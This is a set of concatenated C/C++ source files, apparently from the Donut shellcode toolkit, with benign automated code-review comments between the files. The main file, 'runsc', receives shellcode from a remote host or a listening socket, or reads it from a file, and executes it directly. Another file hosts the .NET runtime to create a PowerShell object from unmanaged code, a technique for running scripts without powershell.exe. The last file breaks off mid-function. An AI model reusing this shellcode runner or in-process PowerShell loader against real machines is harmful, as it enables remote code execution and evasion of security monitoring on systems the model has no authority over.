408 if (s < 0) return 0;
409
410 // ensure we can reuse socket
411 t=1;
412 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
413
414 // bind to port
415 printf ("[ binding to port %s\n", p->port);
416 r = bind(s, p->ai_addr, p->ai_addrlen);
417 if (r == 0) {
418 // listen
419 r = listen (s, 1);
420 if (r == 0) {
421 printf ("[ waiting for connections on %s\n", addr2ip(p));
422 if (r == 0) {
423 t = accept(s, p->ai_addr, &p->ai_addrlen);
424 printf ("[ accepting connection from %s\n", addr2ip(p));
425 if (t > 0) {
426 if (p->tx_mode == RSC_SEND) {
427 send_data(p, t);
428 } else {
429 recv_data(p, t);
430 xcode(p);
431 }
432 }
433 }
434 // close socket to peer
435 shutdown(t, SHUT_RDWR);
436 close(t);
437 } else {
438 perror("listen");
439 }
440 } else {
441 perror("bind");
442 }
443 // close listening socket
444 shutdown(s, SHUT_RDWR);
445 close(s);
446
447 return p->code_len;
448 }
449
450 /**F*****************************************************************/
451 int csr (args_t *p)
452 /**
453 * PURPOSE : opens connection to remote system and sends shellcode
454 *
455 * RETURN : 0 or 1
456 *
457 * NOTES : None
458 *
459 *F*/
460 {
461 int s, r, opt;
462 fd_set fds;
463 struct timeval tv;
464
465 printf ("[ creating socket\n");
466 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
467 if (s < 0) return 0;
468
469 // try connect to remote
470 printf ("[ connecting to %s\n", addr2ip(p));
471 r = connect(s, p->ai_addr, p->ai_addrlen);
472
473 if (r == 0) {
474 if (p->tx_mode==RSC_SEND) {
475 send_data(p, s);
476 } else {
477 recv_data(p, s);
478 xcode(p);
479 }
480 } else {
481 xstrerror("connect");
482 }
483 printf ("[ closing connection\n");
484 shutdown(s, SHUT_RDWR);
485 close(s);
486 return 1;
487 }
488
489 /**F*****************************************************************/
490 void xfile(args_t *p)
491 /**
492 * PURPOSE : read contents of shellcode and attempt to execute it locally
493 *
494 * RETURN : Nothing
495 *
496 * NOTES : None
497 *
498 *F*/
499 {
500 FILE *fd;
501 int len;
502 void *pv;
503
504 p->code_len = 0;
505 p->code = NULL;
506
507 printf ("[ reading code from %s\n", p->file);
508 fd = fopen(p->file, "rb");
509
510 if (fd == NULL) {
511 xstrerror("fopen(\"%s\")", p->file);
512 return;
513 }
514 // read contents of file
515 for (;;) {
516 // first loop? allocate block
517 if(p->code == NULL) {
518 p->code = malloc(BUFSIZ);
519 }
520 // read a block of data
521 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
522 if (len <= 0) break;
523 p->code_len += len;
524 // resize buffer for next read
525 pv = realloc(p->code, p->code_len + BUFSIZ);
526
527 if(pv == NULL) {
528 p->code_len = 0;
529 free(p->code);
530 p->code = NULL;
531 printf("[ error: out of memory!.\n");
532 break;
533 }
534 p->code = pv;
535 }
536 fclose(fd);
537
538 if(p->code_len != 0) {
539 xcode(p);
540 }
541 }
542
543 #ifdef WIN
544 void load_modules(char *names) {
545 HMODULE mod;
546 char *p = strtok(names, ";,");
547
548 while (p != NULL) {
549 printf ("[ loading %s...", p);
550 mod = LoadLibrary(p);
551
552 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
553
554 p = strtok(NULL, ";,");
555 }
556 }
557 #endif
558
559 /**F*****************************************************************/
560 void usage (void) {
561 printf ("\n usage: runsc <address> [options]\n");
562 printf ("\n -4 Use IP version 4 (default)");
563 printf ("\n -6 Use IP version 6");
564 printf ("\n -l Listen mode (required when listening on specific interface)");
565 #ifdef WIN
566 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
567 #endif
568 printf ("\n -f <file> Read PIC from <file>");
569 printf ("\n -s <count> Simulate real process by creating file descriptors");
570 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
571 printf ("\n -x Execute PIC (requires -f)");
572 printf ("\n\n Press any key to continue . . .");
573 getchar ();
574
575 exit (0);
576 }
577
578 /**F*****************************************************************/
579 char* getparam (int argc, char *argv[], int *i) {
580 int n=*i;
581 if (argv[n][2] != 0) {
582 return &argv[n][2];
583 }
584 if ((n+1) < argc) {
585 *i=n+1;
586 return argv[n+1];
587 }
588 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
589 exit (0);
590 }
591
592 void parse_args (args_t *p, int argc, char *argv[]) {
593 int i;
594 char opt;
595
596 // for each argument
597 for (i=1; i<argc; i++)
598 {
599 // is this option?
600 if (argv[i][0]=='-' || argv[i][1]=='/')
601 {
602 // get option value
603 opt=argv[i][1];
604 switch (opt)
605 {
606 case '4':
607 p->ai_family=AF_INET;
608 break;
609 case '6': // use ipv6 (default is ipv4)
610 p->ai_family=AF_INET6;
611 break;
612 case 'x': // execute PIC, requires -f
613 p->mode=RSC_EXEC;
614 break;
615 case 'd': // debug the code
616 p->dbg=1;
617 break;
618 case 'f': // file
619 p->file=getparam(argc, argv, &i);
620 break;
621 case 'l': // listen for incoming connections
622 p->mode=RSC_SERVER;
623 break;
624 #ifdef WIN
625 case 'm': // windows only, loads modules required by shellcode
626 p->modules = getparam(argc, argv, &i);
627 break;
628 #endif
629 case 's': // create file descriptors before execution
630 p->sim=atoi(getparam(argc, argv, &i));
631 break;
632 case 'p': // port number
633 p->port=getparam(argc, argv, &i);
634 p->port_nbr=atoi(p->port);
635 break;
636 case '?': // display usage
637 case 'h':
638 usage ();
639 break;
640 default:
641 printf ("[ unknown option %c\n", opt);
642 usage();
643 break;
644 }
645 } else {
646 // assume it's hostname or ip
647 p->address=argv[i];
648 p->mode=RSC_CLIENT;
649 }
650 }
651 }
652
653 int main (int argc, char *argv[]) {
654 args_t args;
655 struct stat st;
656
657 #ifdef WIN
658 //
659 PVOID OldValue=NULL;
660 WSADATA wsa;
661
662 //Wow64DisableWow64FsRedirection (&OldValue);
663 LoadLibrary("ws2_32");
664 LoadLibrary("advapi32");
665
666 WSAStartup(MAKEWORD(2,0), &wsa);
667 #endif
668
669 setbuf(stdout, NULL);
670 setbuf(stderr, NULL);
671
672 memset (&args, 0, sizeof(args));
673
674 // set default parameters
675 args.address = NULL;
676 args.file = NULL;
677 args.ai_family = AF_INET;
678 args.port = DEFAULT_PORT;
679 args.port_nbr = atoi(args.port);
680 args.mode = -1;
681 args.tx_mode = -1;
682 args.sim = 0;
683 args.dbg = 0;
684
685 printf ("\n[ run shellcode v0.2\n");
686
687 parse_args(&args, argc, argv);
688
689 // check if we have file parameter and it accessible
690 if (args.file!=NULL) {
691 if (stat (args.file, &st)) {
692 printf ("[ unable to access %s\n", args.file);
693 return 0;
694 }
695 }
696
697 #ifdef WIN
698 if (args.modules != NULL) {
699 load_modules(args.modules);
700 }
701 #endif
702 // if mode is executing
703 if (args.mode == RSC_EXEC) {
704 if (args.file != NULL) {
705 xfile(&args);
706 return 0;
707 } else {
708 printf ("\n[ you've used -x without supplying file with -f");
709 return 0;
710 }
711 }
712 if (init_network(&args)) {
713 // if no file specified, we receive and execute data
714 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
715
716 // if mode is -1, we listen for incoming connections
717 if (args.mode == -1) {
718 args.mode=RSC_SERVER;
719 }
720
721 // if no file specified, set to receive one
722 if (args.tx_mode == -1) {
723 args.tx_mode = RSC_RECV;
724 }
725
726 if (args.mode == RSC_SERVER) {
727 ssr (&args);
728 } else {
729 csr (&args);
730 }
731 }
732 if(args.code_len != 0) {
733 free(args.code);
734 }
735 return 0;
736 }
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
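Review bot: Both failure paths in main() are silent — when `LoadLibrary(L"call_api_dll.dll")` returns NULL or `GetProcAddress` fails, the program falls through to `return 0;`, so a broken test DLL looks like a passing test. Make each failure path return a non-zero status, e.g. `if (m == NULL) return 1;` and `if (DonutApiW == NULL) return 1;`, and add `FreeLibrary(m);` after the `call_api` call so the handle is not leaked. Loading the DLL by bare name also follows the normal search order, which is acceptable for a test harness but worth a one-line comment so nobody reuses the pattern elsewhere.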
0
1 // example of using the windows debugger engine from console
2 // derived from code by the blabberer
3
4 #include "debug.h"
5
6 // ##################### Debug class ########################
7 Debug::Debug() {
8 Client = NULL;
9 Control = NULL;
10 Breakpoint = NULL;
11
12 // create instance of IDebugClient
13 Status = DebugCreate(__uuidof(IDebugClient), (void**)&Client);
14 if(Status == S_OK) {
15 // obtain IDebugControl interface
16 Status = Client->QueryInterface(__uuidof(IDebugControl), (void**)&Control);
17 if(Status == S_OK) {
18 // setup callbacks for console I/O
19 Client->SetOutputCallbacks(&OutputCb);
20 Client->SetInputCallbacks(&InputCb);
21 InputCb.Control = Control;
22
23 Client->SetEventCallbacks(&EventCb);
24 EventCb.Control = Control;
25 }
26 }
27 }
28
29 // create new process or attach to existing one
30 // CommandLine should be set to NULL if attaching
31 Debug::Debug(PSTR CommandLine, ULONG ProcessId) {
32 Debug();
33 Start(CommandLine, ProcessId);
34 }
35
36 Debug::~Debug() {
37 if (Control != NULL) {
38 Control->Release();
39 Control = NULL;
40 }
41 if (Client != NULL) {
42 Client->EndSession(DEBUG_END_PASSIVE);
43 Client->Release();
44 Client = NULL;
45 }
46 }
47
48 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId) {
49 ULONG AttachFlags = DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND;
50 ULONG CreateFlags = DEBUG_ONLY_THIS_PROCESS;
51
52 Status = Client->CreateProcessAndAttach(0, CommandLine, CreateFlags, ProcessId, AttachFlags);
53 return Status == S_OK;
54 }
55
56 // ##################### IDebugOutputCallbacks ########################
57 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebugoutputcallbacks
58 STDMETHODIMP StdioOutputCallbacks::QueryInterface(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
59 *Interface = NULL;
60
61 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
62 IsEqualIID(InterfaceId, __uuidof(IDebugOutputCallbacks))) {
63 *Interface = (IDebugOutputCallbacks *)this;
64 AddRef();
65 return S_OK;
66 } else {
67 return E_NOINTERFACE;
68 }
69 }
70
71 // ##################### IDebugInputCallbacks ########################
72 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebuginputcallbacks
73 STDMETHODIMP StdioInputCallbacks::QueryInterface( THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
74 *Interface = NULL;
75
76 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
77 IsEqualIID(InterfaceId, __uuidof(IDebugInputCallbacks))) {
78 *Interface = (IDebugInputCallbacks *)this;
79 AddRef();
80 return S_OK;
81 } else {
82 return E_NOINTERFACE;
83 }
84 }
85
86 STDMETHODIMP StdioInputCallbacks::StartInput(THIS_ IN ULONG BufferSize) {
87 char *Buffer;
88
89 Buffer = (char *)calloc(1, BufferSize+8);
90 fgets(Buffer, BufferSize, stdin);
91 Control->ReturnInput(Buffer);
92 free(Buffer);
93
94 return S_OK;
95 }
96
97 // ##################### DebugBaseEventCallbacks ########################
98 STDMETHODIMP EventCallbacks::Breakpoint( THIS_ IN PDEBUG_BREAKPOINT Bp ) {
99 return DEBUG_STATUS_BREAK;
100 }
101
102 STDMETHODIMP EventCallbacks::CreateProcess(THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle,
103 IN ULONG64 BaseOffset,IN ULONG ModuleSize,IN PCSTR ModuleName,IN PCSTR ImageName,
104 IN ULONG CheckSum, IN ULONG TimeDateStamp,IN ULONG64 InitialThreadHandle,
105 IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset
106 )
107 {
108 HRESULT Status;
109 IDebugBreakpoint* Breakpoint;
110
111 Status = Control->AddBreakpoint(DEBUG_BREAKPOINT_CODE, DEBUG_ANY_ID, &Breakpoint);
112 if(Status == S_OK) {
113 Status = Breakpoint->SetOffset(StartOffset);
114 if(Status == S_OK) {
115 Status = Breakpoint->SetFlags(DEBUG_BREAKPOINT_ENABLED);
116 }
117 }
118 return DEBUG_STATUS_NO_CHANGE;
119 }
120
121 STDMETHODIMP EventCallbacks::CreateThread(THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset, IN ULONG64 StartOffset) {
122 return DEBUG_STATUS_NO_CHANGE;
123 }
124
125 STDMETHODIMP EventCallbacks::Exception( THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance ) {
126 return DEBUG_STATUS_BREAK;
127 }
128
129 STDMETHODIMP EventCallbacks::ExitProcess (THIS_ IN ULONG ExitCode ) {
130 return DEBUG_STATUS_NO_CHANGE;
131 }
132
133 STDMETHODIMP EventCallbacks::ExitThread (THIS_ IN ULONG ExitCode ) {
134 return DEBUG_STATUS_NO_CHANGE;
135 }
136
137 STDMETHODIMP EventCallbacks::GetInterestMask( THIS_ OUT PULONG Mask ) {
138 *Mask =
139 DEBUG_EVENT_BREAKPOINT |
140 DEBUG_EVENT_EXCEPTION |
141 DEBUG_EVENT_CREATE_THREAD |
142 DEBUG_EVENT_EXIT_THREAD |
143 DEBUG_EVENT_CREATE_PROCESS |
144 DEBUG_EVENT_EXIT_PROCESS |
145 DEBUG_EVENT_LOAD_MODULE |
146 DEBUG_EVENT_UNLOAD_MODULE |
147 DEBUG_EVENT_SYSTEM_ERROR |
148 DEBUG_EVENT_SESSION_STATUS |
149 DEBUG_EVENT_CHANGE_DEBUGGEE_STATE |
150 DEBUG_EVENT_CHANGE_ENGINE_STATE |
151 DEBUG_EVENT_CHANGE_SYMBOL_STATE;
152 return S_OK;
153 }
154
155 STDMETHODIMP EventCallbacks::LoadModule( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset,
156 IN ULONG ModuleSize,IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp ) {
157 return DEBUG_STATUS_NO_CHANGE;
158 }
159
160 STDMETHODIMP EventCallbacks::SystemError( THIS_ IN ULONG Error, IN ULONG Level ) {
161 return DEBUG_STATUS_BREAK;
162 }
163
164 STDMETHODIMP EventCallbacks::UnloadModule( THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset ) {
165 return DEBUG_STATUS_NO_CHANGE;
166 }
167
168 STDMETHODIMP EventCallbacks::SessionStatus( THIS_ IN ULONG SessionStatus ) {
169 return DEBUG_STATUS_NO_CHANGE;
170 }
171
172 STDMETHODIMP EventCallbacks::ChangeDebuggeeState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
173 //State = 1;
174 return DEBUG_STATUS_NO_CHANGE;
175 }
176
177 STDMETHODIMP EventCallbacks::ChangeEngineState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
178 return DEBUG_STATUS_NO_CHANGE;
179 }
180
181 STDMETHODIMP EventCallbacks::ChangeSymbolState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
182 return DEBUG_STATUS_NO_CHANGE;
183 }
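Review bot: The two-argument constructor `Debug::Debug(PSTR CommandLine, ULONG ProcessId)` writes `Debug();` as its first statement, which constructs and immediately destroys a temporary rather than initialising this object, so `Client` and `Control` are left uninitialised and `Start()` then dereferences `Client` in `CreateProcessAndAttach`. Use a delegating constructor, `Debug::Debug(PSTR CommandLine, ULONG ProcessId) : Debug() { Start(CommandLine, ProcessId); }` (C++11), and guard `Start()` with `if (Client == NULL) return FALSE;` so a failed `DebugCreate` cannot crash it either. `StdioInputCallbacks::StartInput` likewise uses the `calloc` result and the `fgets` return without checking them; a NULL from either should skip `ReturnInput` rather than pass a null or empty buffer to the engine.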
0
1 #ifndef DEBUG_H
2 #define DEBUG_H
3
4 #include <windows.h>
5 #include <dbgeng.h>
6 #include <stdio.h>
7
8 #pragma comment(lib, "dbgeng.lib")
9
10 class EventCallbacks : public DebugBaseEventCallbacks {
11 public:
12 STDMETHOD_(ULONG, AddRef) (THIS ) { return 1;};
13 STDMETHOD_(ULONG, Release) (THIS ) { return 0;};
14 STDMETHOD(Breakpoint) (THIS_ IN PDEBUG_BREAKPOINT Bp );
15 STDMETHOD(ChangeDebuggeeState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
16 STDMETHOD(ChangeEngineState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
17 STDMETHOD(ChangeSymbolState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
18 STDMETHOD(CreateThread) (THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset,IN ULONG64 StartOffset);
19 STDMETHOD(Exception) (THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance );
20 STDMETHOD(ExitProcess) (THIS_ IN ULONG ExitCode );
21 STDMETHOD(ExitThread) (THIS_ IN ULONG ExitCode );
22 STDMETHOD(GetInterestMask) (THIS_ OUT PULONG Mask );
23 STDMETHOD(SessionStatus) (THIS_ IN ULONG Status );
24 STDMETHOD(SystemError) (THIS_ IN ULONG Error, IN ULONG Level );
25 STDMETHOD(UnloadModule) (THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset );
26 STDMETHOD(LoadModule) (THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName,IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp );
27 STDMETHOD(CreateProcess) ( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp, IN ULONG64 InitialThreadHandle, IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset );
28
29 IDebugClient* Client;
30 IDebugControl* Control;
31 };
32
33 class StdioOutputCallbacks : public IDebugOutputCallbacks {
34 public:
35 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
36 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
37 STDMETHOD_(ULONG, Release)(THIS){ return 0; };
38 STDMETHOD(Output)(THIS_ IN ULONG Mask, IN PCSTR Text) { fputs(Text, stdout); return S_OK; };
39 };
40
41 class StdioInputCallbacks : public IDebugInputCallbacks {
42 public:
43 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
44 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
45 STDMETHOD_(ULONG, Release)(THIS) { return 0; };
46 STDMETHOD(StartInput)(THIS_ IN ULONG BufferSize);
47 STDMETHOD(EndInput)(THIS_ void) { return S_OK; };
48
49 IDebugControl* Control;
50 };
51
52 class Debug {
53 public:
54 Debug();
55 Debug(PSTR CommandLine, ULONG ProcessId);
56 ~Debug();
57 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId);
58
59 StdioOutputCallbacks OutputCb;
60 StdioInputCallbacks InputCb;
61 EventCallbacks EventCb;
62
63 IDebugClient* Client;
64 IDebugControl* Control;
65 IDebugBreakpoint* Breakpoint;
66 bool State;
67 HRESULT Status;
68 };
69
70 #endif
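Review bot: The member declaration `BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId);` inside `class Debug` carries an extra qualification, which is ill-formed C++ — older MSVC accepts it with warning C4596, but conformance mode (/permissive-) as well as GCC and Clang reject it; it should read `BOOL Start(PSTR CommandLine, ULONG ProcessId);`. `bool State` is declared but neither constructor visible in debug.cpp assigns it, so it should get a default (`State = false;` in the constructor) before anything reads it. A short comment on the `AddRef`/`Release` stubs that return 1 and 0 would help too, since that is only safe because the callback objects are members of `Debug` and share its lifetime.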
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
